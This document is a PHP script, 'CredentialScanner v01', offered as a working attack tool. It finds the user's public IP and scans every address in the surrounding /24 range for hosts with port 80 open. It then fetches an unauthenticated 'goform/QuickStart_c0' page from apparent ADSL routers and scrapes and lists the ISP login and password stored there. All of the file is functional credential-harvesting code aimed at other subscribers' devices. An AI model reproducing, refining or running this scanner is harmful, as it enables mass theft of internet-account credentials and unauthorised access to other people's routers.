PHP : CrendentialScanner v01
<?php
/* CONFIGURATION */
$config["ip_server"] = "http://www.whatismyip.com";
/* END OF CONFIGURATION */
/* ------ DON'T MODIFY ANYTHING BEYOND THIS LINE IF YOU'RE NOT SURE WHAT PHP IS !!! ------- */
echo "\n\n\t*********************************************************\n".
"\t* *\n".
"\t* CredentialScanner -- (CScan v.01) *\n".
"\t* -- The automatic way to find adsl account credentials *\n".
"\t* *\n".
"\t* Brought to you by the power of the wired ! *\n".
"\t* *\n".
"\t*********************************************************\n\n\n";
// This function allow the program to grab the local ip, even through a gateway device.
function getLocalIP($server){
echo "connecting to ".$server." ...\n";
$handle = @fopen($server,"r");
if($handle){
$content = fread($handle,200);
$val = preg_match("`((((1|0)?[0-9]{1,2}|25[0-5]|2[0-4][0-9])\.){3}((1|0)?[0-9]{1,2}|25[0-5]|2[0-4][0-9]))`",$content,$ip);
if(!$val){
return 2;
}else{
echo "fetching data ...\n";
return $ip[1];
}
}else{
return 1;
}
}
// Return de c class from an ip adress
function c_class($ip){
return substr($ip,0,strrpos($ip,"."));
}
function validate_url($url){
if( preg_match("`^((http|https|ftp)://)?(www\.)?([0-9a-zA-Z]+(-[0-9a-z-A-Z]+)*)\.[a-zA-Z]{2,3}$`",$url) ){
return true;
}else{
return false;
}
}
function emsg($msg){
echo "[!!] ".$msg."\n";
exit(-1);
}
function wmsg($msg){
echo "[warning] ".$msg."\n";
}
function imsg($msg){
echo "\n\t-- ".$msg." \n\n";
}
function handle_error($error){
switch($error){
case 1: emsg("Unable to connect to ip server"); break;
case 2: emsg("Unable to find any ip adress on the specified server"); break;
case 3: wmsg("Invalid url for ip server [protocol://(www.)domain.ext]"); break;
case 4: wmsg("Unable to find the credentials on the target page (honeypot???)"); break;
case 5: wmsg("Unable to reach the target page"); break;
default: emsg("Unknown error !!!");
}
}
function is_alive($ip){
$host = @gethostbyaddr($ip);
if( $host == $ip ){
echo "target ".$ip." isn't alive\n";
return false;
}else{
echo $host." is alive, testing port 80 (http) ...\n";
if( !$handle = @fsockopen($ip, 80, $errno, $errstr, 10)){
echo "target ".$ip." is not open on port 80 (http)\n";
return false;
}else{
imsg("target ".$ip." open on port 80 (http)");
if($handle) @fclose($handle);
return true;
}
}
}
function the_function_who_is_more_evil_than_the_dervish_evil_ahahaha($url){
echo "trying to get account credentials !!\n";
$handle = @fopen($url."goform/QuickStart_c0","r");
if($handle){
$buffer = "";
while (!feof($handle)) $buffer .= fgets($handle, 4096);
fclose($handle);
$val = preg_match_all("`value='([a-zA-Z0-9@]+)'`",$buffer,$ac);
if(!$val){
return 4;
}else{
echo "\n\tcredentials : \n";
echo "\t\tLogin: ".$ac[1][0];
echo "\n\t\tPassword: ".$ac[1][1];
echo "\n\n";
return array($ac[1][0],$ac[1][1]);
}
}else{
return 5;
}
}
function main(){
global $config;
if( !validate_url($config["ip_server"]) ) handle_error(3);
$ip = getLocalIp($config["ip_server"]);
if(is_int($ip)){
handle_error($ip);
}else{
imsg("your ip adress is : ".$ip);
}
$cc = c_class($ip);
echo "your c class: ".$cc."\n";
$cred = array();
for($i=1; $i<255; $i++):
$newip = $cc.".".$i;
if( $newip != $ip):
echo "testing if ".$newip." is alive\n";
if( is_alive($newip)):
$rep = the_function_who_is_more_evil_than_the_dervish_evil_ahahaha("http://".$newip."/");
if( is_int($rep) ){
handle_error($rep);
}else{
$cred[] = $rep;
}
endif;
endif;
endfor;
echo "\n-------------------- Scan terminated --------------------\n";
echo "\nListing:\n";
echo "\tlogin\t\tpassword\n\n";
foreach($cred as $c):
echo "\t".$c[0]."\t".$c[1]."\n";
endforeach;
echo "\n\n\t[exiting software... entering realworld stage]\n";
}
main();
?>